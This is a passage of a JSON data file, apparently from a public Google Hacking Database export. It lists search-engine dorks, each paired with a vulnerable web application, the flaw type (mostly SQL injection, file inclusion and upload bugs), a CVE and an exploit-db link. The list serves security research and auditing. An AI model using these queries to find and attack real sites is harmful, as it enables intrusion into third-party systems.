(index.php) Shell Upload Vulnerability: https://www.exploit-db.com/exploits/12075"}, {"dork": "allinurl: \"index.php?area\"galid", "description": "Koobi Pro 6.25 showimages Remote SQL Injection Vulnerability: https://www.exploit-db.com/exploits/5414"}, {"dork": "inurl:\"tr1.php?id=\"", "description": "YourFreeWorld Scrolling Text Ads (id) SQL Injection Vulnerability - CVE: 2008-4885: https://www.exploit-db.com/exploits/6942"}, {"dork": "\"Designed by Spaceacre\"", "description": "Spaceacre Multiple SQL Injection Vulnerability: https://www.exploit-db.com/exploits/12551"}, {"dork": "Powered by Shadowed Portal", "description": "Shadowed Portal 5.7d3 (POST) Remote File Inclusion Vulnerability: https://www.exploit-db.com/exploits/4769"}, {"dork": "\"Powered by: PhotoPost PHP 4.6.5\"", "description": "PhotoPost PHP 4.6.5 (ecard.php) SQL Injection Vulnerability - CVE: 2004-0239: https://www.exploit-db.com/exploits/14453"}, {"dork": "inurl:\"com_otzivi\"", "description": "Joomla Component com_otzivi Local File Inclusion Vulnerability: https://www.exploit-db.com/exploits/11494"}, {"dork": "\"Powered by PsNews\"", "description": "PsNews 1.1 (show.php newspath) Local File Inclusion Vulnerability - CVE: 2007-3772: https://www.exploit-db.com/exploits/4174"}, {"dork": "inurl:inc_faqsmanager.asp", "description": "DMXReady Faqs Manager 1.1 Remote Contents Change Vulnerability: https://www.exploit-db.com/exploits/7770"}, {"dork": "\"powered by sX-Shop\"", "description": "sX-Shop Multiple SQL Injection Vulnerabilities: https://www.exploit-db.com/exploits/14558"}, {"dork": "intext:'Powered by ProArcadeScript ' inurl:'game.php?id='", "description": "ProArcadeScript to Game (game) SQL Injection Vulnerability - CVE: 2010-1069: https://www.exploit-db.com/exploits/11080"}, {"dork": "inurl:tr.php?id= Downline", "description": "YourFreeWorld Downline Builder (id) Remote SQL Injection Vulnerability - CVE: 2008-4895: https://www.exploit-db.com/exploits/6935"}, {"dork": "inurl:tr.php?id= Autoresponder", "description": "YourFreeWorld Autoresponder Hosting (id) SQL Injection Vulnerability - CVE: 2008-4882: https://www.exploit-db.com/exploits/6938"}, {"dork": "inurl:\"/index.php?m=\" \"PHPRecipeBook 2.39\"", "description": "PHPRecipeBook 2.39 (course_id) Remote SQL Injection Vulnerability - CVE: 2009-4883: https://www.exploit-db.com/exploits/8330"}, {"dork": "\"powered by webClassifieds\"", "description": "webClassifieds 2005 (Auth Bypass) SQL Injection Vulnerability - CVE: 2008-5817: https://www.exploit-db.com/exploits/7602"}, {"dork": "\"Powered by SoftbizScripts\" \"ALL JOBS\"", "description": "Softbiz Jobs & Recruitment Remote SQL Injection Vulnerability - CVE: 2007-5316: https://www.exploit-db.com/exploits/4504"}, {"dork": "inurl:com_jabode", "description": "Joomla Component jabode (id) Remote SQL Injection Vulnerability - CVE: 2008-7169: https://www.exploit-db.com/exploits/5963"}, {"dork": "inurl:\"nabopoll/\"", "description": "nabopoll 1.2 Remote Unprotected Admin Section Vulnerability - CVE: 2007-0873: https://www.exploit-db.com/exploits/3305"}, {"dork": "\"Powered by CMScout \u00c2\u00a92005 CMScout Group\"", "description": "CMScout 2.05 (common.php bit) Local File Inclusion Vulnerability - CVE: 2008-3415: https://www.exploit-db.com/exploits/6142"}, {"dork": "inurl:test.php Powered by TalkBack", "description": "TalkBack 2.3.14 Multiple Remote Vulnerabilities - CVE: 2009-4854: https://www.exploit-db.com/exploits/9095"}, {"dork": "\"Powered by Ovidentia\"", "description": "Ovidentia 6.6.5 (item) Remote SQL Injection Vulnerability - CVE: 2008-3918: https://www.exploit-db.com/exploits/6232"}, {"dork": "team5 studio all rights reserved site:cn", "description": "Team 1.x (DD/XSS) Multiple Remote Vulnerabilities - CVE: 2009-0760: https://www.exploit-db.com/exploits/7982"}, {"dork": "\"powered by phpGreetCards\"", "description": "phpGreetCards XSS/Arbitrary File Upload Vulnerability - CVE: 2008-6848: https://www.exploit-db.com/exploits/7561"}, {"dork": "inurl:/wp-content/plugins/wpSS/", "description": "Wordpress Plugin Spreadsheet 0.6 SQL Injection Vulnerability - CVE: 2008-1982: https://www.exploit-db.com/exploits/5486"}, {"dork": "\"Powerd by www.e-webtech.com\"", "description": "e-webtech (new.asp?id=) SQL Injection Vulnerability: https://www.exploit-db.com/exploits/12547"}, {"dork": "inurl:inc_billboardmanager.asp?ItemID=", "description": "DMXReady Billboard Manager 1.1 Remote File Upload Vulnerability: https://www.exploit-db.com/exploits/7791"}, {"dork": "allinurl :\"modules/recipe\"", "description": "XOOPS Module Recipe (detail.php id) SQL Injection Vulnerability: https://www.exploit-db.com/exploits/5473"}, {"dork": "\"powered by php advanced transfer manager\"", "description": "phpAtm 1.30 (downloadfile) Remote File Disclosure Vulnerability - CVE: 2007-2659: https://www.exploit-db.com/exploits/3918"}, {"dork": "\"Powered by GeN4\"", "description": "PTCPay GEN4 (buyupg.php) SQL Injection Vulnerability: https://www.exploit-db.com/exploits/14086"}, {"dork": "\"Powered By Gravity Board X v2.0 BETA\"", "description": "Gravity Board X 2.0b SQL Injection / Post Auth Code Execution - CVE: 2008-2996: https://www.exploit-db.com/exploits/8350"}, {"dork": "inurl:com_flippingbook", "description": "Joomla Component FlippingBook 1.0.4 SQL Injection Vulnerability - CVE: 2008-2095: https://www.exploit-db.com/exploits/5484"}, {"dork": "\"Powered by vlBook 1.21\"", "description": "vlBook 1.21 (XSS/LFI) Multiple Remote Vulnerabilities - CVE: 2008-2073: https://www.exploit-db.com/exploits/5529"}, {"dork": "Copyright \u00c2\u00a9 Rotator 2008", "description": "YourFreeWorld URL Rotator (id) Remote SQL Injection Vulnerability: https://www.exploit-db.com/exploits/6949"}, {"dork": "inurl:tr.php?id= Reminder Service", "description": "YourFreeWorld Reminder Service (id) SQL Injection Vulnerability - CVE: 2008-4881: https://www.exploit-db.com/exploits/6943"}, {"dork": "\"Jevonweb Guestbook\"", "description": "Jevonweb Guestbook Remote Admin Access: https://www.exploit-db.com/exploits/10665"}, {"dork": "inurl:inc_contactusmanager.asp", "description": "DMXReady Contact Us Manager 1.1 Remote Contents Change Vuln: https://www.exploit-db.com/exploits/7768"}, {"dork": "inurl:com_neorecruit", "description": "Joomla Component com_neorecruit 1.4 SQL Injection Vulnerability: https://www.exploit-db.com/exploits/14570"}, {"dork": "\"index.php?option=com_mdigg\"", "description": "Joomla Component com_mdigg SQL Injection Vulnerability: https://www.exploit-db.com/exploits/10847"}, {"dork": "\"Uploader by CeleronDude.\"", "description": "Uploader by CeleronDude 5.3.0 - Upload Vulnerability: https://www.exploit-db.com/exploits/11166"}, {"dork": "'SEO by NuSEO.PHP'", "description": "NuSEO PHP Enterprise 1.6 Remote File Inclusion Vulnerability - CVE: 2007-5409: https://www.exploit-db.com/exploits/4512"}, {"dork": "powered by zeeways", "description": "Zeeways Technology (product_desc.php) SQL Injection Vulnerability: https://www.exploit-db.com/exploits/11047"}, {"dork": "intitle:\"Shorty (Beta)\"", "description": "Shorty 0.7.1b (Auth Bypass) Insecure Cookie Handling Vulnerability: https://www.exploit-db.com/exploits/9419"}, {"dork": "inurl:index.php?mod=ConcoursPhoto", "description": "KwsPHP Module ConcoursPhoto (C_ID) SQL Injection Vulnerability - CVE: 2008-1758: https://www.exploit-db.com/exploits/5353"}, {"dork": "\"Copyright MaxiSepet \u00a9\"", "description": "MaxiSepet 1.0 (link) SQL Injection Vulnerability: https://www.exploit-db.com/exploits/1900"}, {"dork": "Powered by sabros.us", "description": "sabros.us 1.75 (thumbnails.php) Remote File Disclosure Vulnerability - CVE: 2008-1799: https://www.exploit-db.com/exploits/5360"}, {"dork": "inurl:inc_registrationmanager.asp", "description": "DMXReady Registration Manager 1.1 Contents Change Vulnerability: https://www.exploit-db.com/exploits/7784"}, {"dork": "\"You have not provided a survey identification number\"", "description": "LimeSurvey 1.52 (language.php) Remote File Inclusion Vulnerability - CVE: 2007-5573: https://www.exploit-db.com/exploits/4544"}, {"dork": "\"Powered by ComicShout\"", "description": "ComicShout 2.8 (news.php news_id) SQL Injection Vulnerability - CVE: 2008-6425: https://www.exploit-db.com/exploits/5713"}, {"dork": "powered by Pixaria. Gallery", "description": "Pixaria Gallery 1.x (class.Smarty.php) Remote File Include Vulnerability - CVE: 2007-2457: https://www.exploit-db.com/exploits/3733"}, {"dork": "\"Powered by FlashGameScript\"", "description": "FlashGameScript 1.7 (user) Remote SQL Injection Vulnerability - CVE: 2007-3646: https://www.exploit-db.com/exploits/4161"}, {"dork": "index.php?option=com_ongallery", "description": "Joomla Component OnGallery SQL Injection Vulnerability: https://www.exploit-db.com/exploits/14659"}, {"dork": "\"This website is powered by Trio\"", "description": "TriO 2.1 (browse.php id) Remote SQL Injection Vulnerability - CVE: 2008-3418: https://www.exploit-db.com/exploits/6141"}, {"dork": "content_by_cat.asp?contentid ''catid''", "description": "ASPapp KnowledgeBase (catid) Remote SQL Injection Vulnerability: https://www.exploit-db.com/exploits/6590"}, {"dork": "browse_videos.php?", "description": "phpVID 0.9.9 (categories_type.php cat) SQL Injection Vulnerability - CVE: 2007-3610: https://www.exploit-db.com/exploits/4153"}, {"dork": "inurl:JBSPro", "description": "JiRos Banner Experience 1.0 (Create Admin Bypass) - CVE: 2006-1213: https://www.exploit-db.com/exploits/1571"}, {"dork": "inurl:inc_joblistingmanager.asp", "description": "DMXReady Job Listing 1.1 Remote Contents Change Vulnerability: https://www.exploit-db.com/exploits/7771"}, {"dork": "Maintained with the Ocean12 Contact Manager Pro v1.02", "description": "Ocean12 Contact Manager Pro (SQL/XSS/DDV) Multiple Vulnerabilities - CVE: 2008-6369: https://www.exploit-db.com/exploits/7244"}, {"dork": "buyers_subcategories.php?IndustryID=", "description": "Softbiz B2B trading Marketplace Script buyers_subcategories SQL Injection Vulnerability: https://www.exploit-db.com/exploits/12245"}, {"dork": "\"Powered by Minerva\"", "description": "Minerva 2.0.21 build 238a (phpbb_root_path) File Include Vulnerability - CVE: 2006-5077: https://www.exploit-db.com/exploits/2429"}, {"dork": "inurl:\"izle.asp?oyun=\"", "description": "FoT Video scripti 1.1b (oyun) Remote SQL Injection Vulnerability - CVE: 2008-4176: https://www.exploit-db.com/exploits/6453"}, {"dork": "Copyright \u00c2\u00a9 Viral Marketing 2008", "description": "YourFreeWorld Viral Marketing (id) SQL Injection Vulnerability: https://www.exploit-db.com/exploits/6941"}, {"dork": "inurl:\"IDFM=\" \"form.php\"", "description": "360 Web Manager 3.0 (IDFM) SQL Injection Vulnerability - CVE: 2008-0430: https://www.exploit-db.com/exploits/4944"}, {"dork": "inurl:inc_newsmanager.asp", "description": "DMXReady News Manager 1.1 Arbitrary Category Change Vuln: https://www.exploit-db.com/exploits/7752"}, {"dork": "Powered by Arctic v2.0.0", "description": "Artic Issue Tracker 2.0.0 (index.php filter) SQL Injection Vulnerability - CVE: 2008-3250: https://www.exploit-db.com/exploits/6097"}, {"dork": "Powered by: Zanfi Solutions", "description": "Zanfi CMS lite 1.2 Multiple Local File Inclusion Vulnerabilities - CVE: 2008-4158: https://www.exploit-db.com/exploits/6413"}, {"dork": "\"Powered by SiteX 0.7 Beta\"", "description": "SiteX 0.7.4.418 (THEME_FOLDER) Local File Inclusion Vulnerabilities - CVE: 2009-1846: https://www.exploit-db.com/exploits/8816"}, {"dork": "inurl:\"freshlinks_panel/index.php?linkid\"", "description": "PHP-Fusion Mod freshlinks (linkid) Remote SQL Injection Vuln - CVE: 2008-5074: https://www.exploit-db.com/exploits/6620"}, {"dork": "Powered By WebSihirbaz\u00c4\u00b1", "description": "WebSihirbazi 5.1.1 (pageid) Remote SQL Injection Vulnerability - CVE: 2007-6556: https://www.exploit-db.com/exploits/4777"}, {"dork": "inurl:inc_paypalstoremanager.asp", "description": "DMXReady PayPal Store Manager 1.1 Contents Change Vulnerability: https://www.exploit-db.com/exploits/7782"}, {"dork": "Powered By phpCOIN 1.2.3", "description": "phpCOIN 1.2.3 (session_set.php) Remote Include Vulnerability - CVE: 2006-4424: https://www.exploit-db.com/exploits/2254"}, {"dork": "Powered By: \u00a9 Simplicity oF Upload", "description": "Simplicity oF Upload (1.3.2) Remote File Upload Vulnerability - CVE: 2009-4818: https://www.exploit-db.com/exploits/10568"}, {"dork": "\"Developed by Quate.net.\"", "description": "Grape Statistics 0.2a (location) Remote File Inclusion Vulnerability - CVE: 2008-1963: https://www.exploit-db.com/exploits/5463"}, {"dork": "allinurl:directory.php?ax=list", "description": "Prozilla Directory Script (directory.php cat_id) SQL Injection Vulnerbility - CVE: 2007-3809: https://www.exploit-db.com/exploits/4185"}, {"dork": "inurl:w3.php?nodeId=", "description": "Aspect Ratio CMS Blind SQL Injection Vulnerability: https://www.exploit-db.com/exploits/15205"}, {"dork": "VS-G\u00e4stebuch V. \u00a9", "description": "S-Gastebuch 1.5.3 (gb_pfad) Remote File Include - CVE: 2007-1011: https://www.exploit-db.com/exploits/3328"}, {"dork": "Uebimiau Webmail v3.2.0-1.8", "description": "Uebimiau Web-Mail v3.2.0-1.8 Remote File / Overwrite Vulnerabilities: https://www.exploit-db.com/exploits/8944"}, {"dork": "\"ATutor 1.6.4\"", "description": "ATutor 1.6.4 Multiple Cross Site Scripting - CVE: 2010-0971: https://www.exploit-db.com/exploits/11685"}, {"dork": "\"Search | Invite | Mail | Blog | Forum\"", "description": "Myspace Clone Script Remote SQL Injection Vulnerability - CVE: 2007-5992: https://www.exploit-db.com/exploits/4622"}, {"dork": "elkagroup - Image Gallery v1.0 - All right reserved", "description": "elkagroup Image Gallery 1.0 Arbitrary File Upload Vulnerability - CVE: 2009-1446: https://www.exploit-db.com/exploits/8514"}, {"dork": "intext:\"Powered by CLscript.com\"", "description": "CLScript.com Classifieds Software SQL Injection Vunerability - CVE: 2010-1660: https://www.exploit-db.com/exploits/12423"}, {"dork": "inurl:\"index.php?option=com_oziogallery\"", "description": "Joomla Ozio Gallery Component (com_oziogallery) SQL Injection Vulnerability - CVE: 2010-2910: https://www.exploit-db.com/exploits/14462"}, {"dork": "\"Powered by Content Injector v1.53\"", "description": "Content Injector 1.53 (index.php) Remote SQL Injection Vulnerability - CVE: 2007-6394: https://www.exploit-db.com/exploits/4706"}, {"dork": "inurl:\"click.php?hostid=\"", "description": "Adult Banner Exchange Website (targetid) SQL Injection Vulnerability - CVE: 2008-6101: https://www.exploit-db.com/exploits/6909"}, {"dork": "inurl:/tiny_mce/plugins/filemanager/", "description": "TinyMCE MCFileManager 2.1.2 Arbitrary File Upload Vulnerability: https://www.exploit-db.com/exploits/15194"}, {"dork": "inurl:\"search_results.php?browse=1\"", "description": "SoftBizScripts Dating Script SQL Injection Vunerability - CVE: 2006-3271: https://www.exploit-db.com/exploits/12438"}, {"dork": "\"powered by fuzzylime\"", "description": "fuzzylime cms 3.01 (admindir) Remote File Inclusion Vulnerability - CVE: 2008-1405: https://www.exploit-db.com/exploits/5260"}, {"dork": "Powered by ThinkAdmin", "description": "ThinkAdmin (page.php) Sql Injection Vulnerability: https://www.exploit-db.com/exploits/11296"}, {"dork": "phpBazar Ver. 2.1.0", "description": "phpBazar-2.1.1fix Remote Administration-Panel Vulnerability - CVE: 2009-4222: https://www.exploit-db.com/exploits/10233"}, {"dork": "inurl:gotourl.php?id=", "description": "PozScripts Classified Auctions (gotourl.php id) SQL Injection Vuln - CVE: 2008-4755: https://www.exploit-db.com/exploits/6839"}, {"dork": "inurl:\"module=helpcenter\"", "description": "Help Center Live 2.0.6(module=helpcenter&file=) Local File Inclusion - CVE: 2010-1652: https://www.exploit-db.com/exploits/12421"}, {"dork": "Powered By PHPhotoalbum", "description": "PHPhotoalbum Remote File Upload Vulnerability - CVE: 2009-4819: https://www.exploit-db.com/exploits/10584"}, {"dork": "\"Gallery powered by fMoblog\"", "description": "Wordpress Plugin fMoblog 2.1 (id) SQL Injection Vulnerability - CVE: 2009-0968: https://www.exploit-db.com/exploits/8229"}, {"dork": "\"Powered by Orca Interactive Forum Script\"", "description": "Orca 2.0/2.0.2 (params.php) Remote File Inclusion Vulnerability - CVE: 2008-5167: https://www.exploit-db.com/exploits/5955"}, {"dork": "inurl:\"browsecats.php?cid=\"", "description": "SoftBizScripts Hosting Script SQL Injection Vunerability - CVE: 2005-3817: https://www.exploit-db.com/exploits/12439"}, {"dork": "\"Powered by MySpace Content Zone\"", "description": "MySpace Content Zone 3.x Remote File Upload Vulnerability - CVE: 2007-6668: https://www.exploit-db.com/exploits/4741"}, {"dork": "allinurl: \"com_actualite\"", "description": "Joomla Component actualite 1.0 (id) SQL Injection Vulnerability - CVE: 2008-4617: https://www.exploit-db.com/exploits/5337"}, {"dork": "inurl:\"com_book\"", "description": "Joomla Component com_book SQL injection Vulnerability: https://www.exploit-db.com/exploits/11213"}, {"dork": "\"powered by AllMyGuests\"", "description": "AllMyGuests 0.4.1 (AMG_id) Remote SQL Injection Vulnerability - CVE: 2008-1961: https://www.exploit-db.com/exploits/5469"}, {"dork": "allinurl : /web3news/", "description": "Web3news 0.95 (PHPSECURITYADMIN_PATH) Remote Include Vuln - CVE: 2006-4452: https://www.exploit-db.com/exploits/2269"}, {"dork": "Powered by BoutikOne\u00ae", "description": "BoutikOne v1 SQL Injection Vulnerability - CVE: 2010-3479: https://www.exploit-db.com/exploits/15049"}, {"dork": "\" Powered by Xpoze \"", "description": "Xpoze 4.10 (home.html menu) Blind SQL Injection Vulnerability - CVE: 2008-6352: https://www.exploit-db.com/exploits/7432"}, {"dork": "allinurl:\"macgurublog.php?uid=\"", "description": "e107 Plugin BLOG Engine 2.1.4 Remote SQL Injection Vulnerability - CVE: 2008-6438: https://www.exploit-db.com/exploits/6856"}, {"dork": "powered by AirvaeCommerce 3.0", "description": "AirvaeCommerce 3.0 (pid) Remote SQL Injection Vulnerability - CVE: 2008-5223: https://www.exploit-db.com/exploits/5689"}, {"dork": "inurl: \"tops_top.php? id_cat =\"", "description": "Million Pixels 3 (id_cat) Remote SQL Injection Vulnerability - CVE: 2008-3204: https://www.exploit-db.com/exploits/6044"}, {"dork": "PHPEmailManager", "description": "PHP Email Manager (remove.php ID) SQL Injection Vulnerability - CVE: 2009-3209: https://www.exploit-db.com/exploits/9470"}, {"dork": "\"Powered by ExBB \"", "description": "ExBB Italiano 0.2 exbb[home_path] Remote File Include Vulnerability - CVE: 2006-4488: https://www.exploit-db.com/exploits/2273"}, {"dork": "\"Powered by Locazolist Copyright \u00a9 2006\"", "description": "LocazoList 2.01a beta5 (subcatID) Remote SQL Injection Vulnerability - CVE: 2007-0129: https://www.exploit-db.com/exploits/3073"}, {"dork": "\"txx cms\"", "description": "Txx CMS 0.2 Multiple Remote File Inclusion Vulnerabilities - CVE: 2007-4819: https://www.exploit-db.com/exploits/4381"}, {"dork": "inurl:\"printer.asp?forum=\"", "description": "ASP Message Board 2.2.1c Remote SQL Injection Vulnerability - CVE: 2007-5887: https://www.exploit-db.com/exploits/4609"}, {"dork": "inurl:\"com_ownbiblio\" catalogue", "description": "Joomla Component ownbiblio 1.5.3 (catid) SQL Injection Vulnerability - CVE: 2008-6184: https://www.exploit-db.com/exploits/6730"}, {"dork": "\"CMS Webmanager-pro\"", "description": "CMS WebManager-Pro Multiple Remote SQL Injection Vulnerabilities - CVE: 2008-2351: https://www.exploit-db.com/exploits/5641"}, {"dork": "inurl:\"/geeklog/\"", "description": "GeekLog 1.7.0 (fckeditor) Arbitrary File Upload Vulnerability: https://www.exploit-db.com/exploits/15277"}, {"dork": "inurl:/webCal3_detail.asp?event_id=", "description": "WebCal (webCal3_detail.asp event_id) SQL Injection Vulnerability - CVE: 2009-1945: https://www.exploit-db.com/exploits/8857"}, {"dork": "inurl:classifieds/view.php?category=", "description": "YourFreeWorld Classifieds (category) Remote SQL Injection Vulnerability - CVE: 2008-3755: https://www.exploit-db.com/exploits/6945"}, {"dork": "\"Signkorn Guestbook 1.3\"", "description": "Signkorn Guestbook 1.3 (dir_path) Remote File Include Vulnerability - CVE: 2006-4788: https://www.exploit-db.com/exploits/2354"}, {"dork": "inurl:\"powered by eggblog\"", "description": "Eggblog 3.07 Remote (SQL Injection / Privilege Escalation) - CVE: 2006-2725: https://www.exploit-db.com/exploits/1842"}, {"dork": "\"pForum 1.30\"", "description": "pForum 1.30 (showprofil.php id) Remote SQL Injection Vulnerability - CVE: 2008-4355: https://www.exploit-db.com/exploits/6442"}, {"dork": "Powered By AJ Auction", "description": "AJ Auction Pro Platinum (seller_id) SQL Injection Vulnerability - CVE: 2008-6004: https://www.exploit-db.com/exploits/6561"}, {"dork": "faqview.asp?key", "description": "Techno Dreams FAQ Manager 1.0 Remote SQL Injection Vulnerability - CVE: 2006-4892: https://www.exploit-db.com/exploits/2385"}, {"dork": "\"Powered by: MFH v1\"", "description": "Mega File Hosting Script 1.2 (fid) Remote SQL Injection Vulnerability - CVE: 2008-2521: https://www.exploit-db.com/exploits/5598"}, {"dork": "inurl:\"com_beamospetition\"", "description": "Joomla Component (com_beamospetition) SQL Injection Vulnerability: https://www.exploit-db.com/exploits/14502"}, {"dork": "\"Powered By 4smart\"", "description": "Magician Blog 1.0 (ids) Remote SQL Injection Vulnerability: https://www.exploit-db.com/exploits/9282"}, {"dork": "inurl :/PhotoCart/", "description": "Photo Cart 3.9 (adminprint.php) Remote File Include Vulnerability - CVE: 2006-6093: https://www.exploit-db.com/exploits/2817"}, {"dork": "\"Powered by GetMyOwnArcade\"", "description": "GetMyOwnArcade (search.php query) Remote SQL Injection Vulnerability - CVE: 2007-4386: https://www.exploit-db.com/exploits/4291"}, {"dork": "Powered By : PersianBB.com", "description": "PersianBB (iranian_music.php id) Remote SQL Injection Vulnerability: https://www.exploit-db.com/exploits/6858"}, {"dork": "\"Powered by Simple PHP Text newsletter\"", "description": "Simple PHP Newsletter 1.5 (olang) Local File Inclusion Vulnerabilities - CVE: 2009-0340: https://www.exploit-db.com/exploits/7813"}, {"dork": "allinurl: \"com_estateagent\"", "description": "Mambo Component EstateAgent 0.1 Remote SQL Injection Vulnerability - CVE: 2008-0517: https://www.exploit-db.com/exploits/5016"}, {"dork": "powered by Php Blue Dragon Platinum", "description": "Php Blue Dragon CMS 2.9 Remote File Include Vulnerability - CVE: 2006-2392: https://www.exploit-db.com/exploits/1779"}, {"dork": "\"Powered by DZcms\"", "description": "DZcms v.3.1 (products.php pcat) Remote SQL Injection Vulnerability: https://www.exploit-db.com/exploits/7722"}, {"dork": "inurl:\"com_event\"", "description": "Joomla Component com_event Multiple Vulnerabilities: https://www.exploit-db.com/exploits/12633"}, {"dork": "inurl:\"/alternate_profiles/\"", "description": "e107 Plugin alternate_profiles (id) SQL Injection Vulnerability - CVE: 2008-4785: https://www.exploit-db.com/exploits/6849"}, {"dork": "\"This website is powered by Mobius\"", "description": "Mobius 1.4.4.1 (browse.php id) Remote SQL Injection Vulnerability - CVE: 2008-3420: https://www.exploit-db.com/exploits/6138"}, {"dork": "intitle:WEBEYES GUEST BOOK inurl:.asp?id=", "description": "WebEyes Guest Book v.3 (yorum.asp mesajid) SQL Injection Vulnerability - CVE: 2009-1950: https://www.exploit-db.com/exploits/8859"}, {"dork": "\"visiteurs v2.0\"", "description": "Les Visiteurs (Visitors) 2.0 (config.inc.php) File Include Vulnerability: https://www.exploit-db.com/exploits/2449"}, {"dork": "inurl:\"com_portfol\"", "description": "Joomla Component com_portfol SQL Injection Vulnerability: https://www.exploit-db.com/exploits/10844"}, {"dork": "\"Powered by ZeeMatri\"", "description": "ZEEMATRI 3.0 (bannerclick.php adid) SQL Injection Vulnerability - CVE: 2008-5782: https://www.exploit-db.com/exploits/7072"}, {"dork": "inurl:tr.php?id= Banner", "description": "Banner Management Script (tr.php id) Remote SQL Injection Vulnerability - CVE: 2008-3749: https://www.exploit-db.com/exploits/6276"}, {"dork": "Powered By: 4images 1.7.1", "description": "4images 1.7.1 Remote SQL Injection Vulnerability - CVE: 2006-5236: https://www.exploit-db.com/exploits/10572"}, {"dork": "intext:\"Powered by Max.Blog\"", "description": "Max.Blog 1.0.6 (submit_post.php) SQL Injection Vulnerability: https://www.exploit-db.com/exploits/7898"}, {"dork": "intitle:USP FOSS Distribution", "description": "USP FOSS Distribution 1.01 (dnld) Remote File Disclosure Vulnerability - CVE: 2007-2271: https://www.exploit-db.com/exploits/3794"}, {"dork": "inurl:\"vbplaza.php?do=\"", "description": "vBulletin vbBux/vbPlaza 2.x (vbplaza.php) Blind SQL Injection Vuln: https://www.exploit-db.com/exploits/8784"}, {"dork": "allintext:\"Powered by: TotalCalendar\"", "description": "TotalCalendar 2.402 (view_event.php) Remote SQL Injection Vulns - CVE: 2007-3515: https://www.exploit-db.com/exploits/4130"}, {"dork": "Powered by PHP Dir Submit - Directory Submission Script", "description": "PHP Dir Submit (aid) Remote SQL Injection Vulnerability - CVE: 2009-3970: https://www.exploit-db.com/exploits/9484"}, {"dork": "intitle:\"MAXSITE\"", "description": "CMS MAXSITE 1.10 (category) Remote SQL Injection Vulnerability - CVE: 2008-2487: https://www.exploit-db.com/exploits/5676"}, {"dork": "Power with ecsportal rel 6.5", "description": "ecsportal rel 6.5 (article_view_photo.php id) SQL Injection Vulnerability: https://www.exploit-db.com/exploits/8848"}, {"dork": "inurl:\"list.php?c=\"", "description": "Prozilla Top 100 v1.2 Arbitrary Delete Stats Vulnerability - CVE: 2008-1785: https://www.exploit-db.com/exploits/5384"}, {"dork": "Powered by YaBBSM V2.5.0 Based on YABB SE", "description": "YaBBSM 3.0.0 (Offline.php) Remote File Include Vulnerability - CVE: 2006-5413: https://www.exploit-db.com/exploits/2553"}, {"dork": "\"Powered by YDC\"", "description": "YDC (kdlist.php cat) Remote SQL Injection Vulnerability: https://www.exploit-db.com/exploits/6811"}, {"dork": "Powered by emuCMS", "description": "emuCMS 0.3 (cat_id) Remote SQL Injection Vulnerability - CVE: 2008-2891: https://www.exploit-db.com/exploits/5878"}, {"dork": "intitle:\"Rx08.ii36B.Rv\"", "description": "RapidLeech Scripts Remote File Upload Vulnerability: https://www.exploit-db.com/exploits/14430"}, {"dork": "intext:\"Design by BB Media.Org\"", "description": "BBMedia Design's (news_more.php) SQL Injection Vulnerability: https://www.exploit-db.com/exploits/12718"}, {"dork": "calendar.asp?eventdetail", "description": "AspWebCalendar 2008 Remote File Upload Vulnerability - CVE: 2008-2832: https://www.exploit-db.com/exploits/5850"}, {"dork": "Powered by Multi Website 1.5", "description": "Multi Website 1.5 (index php action) SQL Injection Vulnerability - CVE: 2009-3150: https://www.exploit-db.com/exploits/9344"}, {"dork": "Powered by iScripts VisualCaster", "description": "SQli Vulnerability in iScripts VisualCaster - CVE: 2010-2853: https://www.exploit-db.com/exploits/12451"}, {"dork": "\"Powered by DesClub.com - phpLinkat\"", "description": "phpLinkat 0.1 Insecure Cookie Handling / SQL Injection Vulnerability - CVE: 2008-3407: https://www.exploit-db.com/exploits/6140"}, {"dork": "Powered by: Zanfi Solutions", "description": "Zanfi CMS lite / Jaw Portal free (page) SQL Injection Vulnerability - CVE: 2008-4159: https://www.exploit-db.com/exploits/6423"}, {"dork": "inurl:\"com_equipment\"", "description": "Joomla Component (com_equipment) SQL Injection Vulnerability: https://www.exploit-db.com/exploits/14655"}, {"dork": "\"Everyone should be on TV! Now you can upload 2 TV\"", "description": "Youtuber Clone (ugroups.php UID) Remote SQL Injection Vulnerability - CVE: 2008-3419: https://www.exploit-db.com/exploits/6147"}, {"dork": "\" created by creato.biz \"", "description": "Creato Script SQL Injection Vulnerability: https://www.exploit-db.com/exploits/12807"}, {"dork": "\"Powered by: Southburn\"", "description": "southburn Web (products.php) Sql Injection Vulnerability: https://www.exploit-db.com/exploits/11430"}, {"dork": "infusions/raidtracker_panel/thisraidprogress.php?", "description": "PHP-Fusion Mod raidtracker_panel (INFO_RAID_ID) SQL Injection - CVE: 2008-4521: https://www.exploit-db.com/exploits/6682"}, {"dork": "inurl:\"phpsecurepages\"", "description": "phpSecurePages 0.28b (secure.php) Remote File Include Vulnerability: https://www.exploit-db.com/exploits/2452"}, {"dork": "allinurl: \"index.php?mod=galerie\"action=gal", "description": "KwsPHP Module Galerie (id_gal) Remote SQL Injection Vulnerability - CVE: 2008-6197: https://www.exploit-db.com/exploits/5350"}, {"dork": "Site cr\u00e9\u00e9 avec GuppY v4.5.18 \u00a9", "description": "GuppY v4.5.18 Blind SQL/XPath injection Vulnerability - CVE: 2010-1740: https://www.exploit-db.com/exploits/12484"}, {"dork": "intext:\"Powered by WSN Links Basic Edition\"", "description": "WSN Links Basic Edition (displaycat catid) SQL Injection Vulnerbility - CVE: 2007-3981: https://www.exploit-db.com/exploits/4209"}, {"dork": "inurl:\"/index.php?option=com_rsfiles\"", "description": "Joomla Component RSfiles 1.0.2 (path) File Download Vulnerability - CVE: 2007-4504: https://www.exploit-db.com/exploits/4307"}, {"dork": "Powered By AstroSPACES", "description": "AstroSPACES (id) Remote SQL Injection Vulnerability - CVE: 2008-4642: https://www.exploit-db.com/exploits/6758"}, {"dork": "Powered by FluentCMS", "description": "FluentCMS (view.php sid) Remote SQL Injection Vulnerability - CVE: 2008-6642: https://www.exploit-db.com/exploits/5509"}, {"dork": "inurl:dpage.php?docID", "description": "The Real Estate Script (dpage.php docID) SQL Injection Vulnerability - CVE: 2008-2443: https://www.exploit-db.com/exploits/5610"}, {"dork": "inurl:\"index.php?option=com_iproperty\"", "description": "Joomla Component (com_iproperty) SQL Injection Vulnerability: https://www.exploit-db.com/exploits/14450"}, {"dork": "\"Powered by WebStudio eCatalogue\"", "description": "WebStudio eCatalogue (pageid) Blind SQL Injection Vulnerability - CVE: 2008-5294: https://www.exploit-db.com/exploits/7223"}, {"dork": "powered by JAF CMS \u00a9 2004 - 2006", "description": "JAF CMS 4.0 RC1 Multiple Remote File Include Vulnerabilities - CVE: 2006-7127: https://www.exploit-db.com/exploits/2474"}, {"dork": "\"Powered by 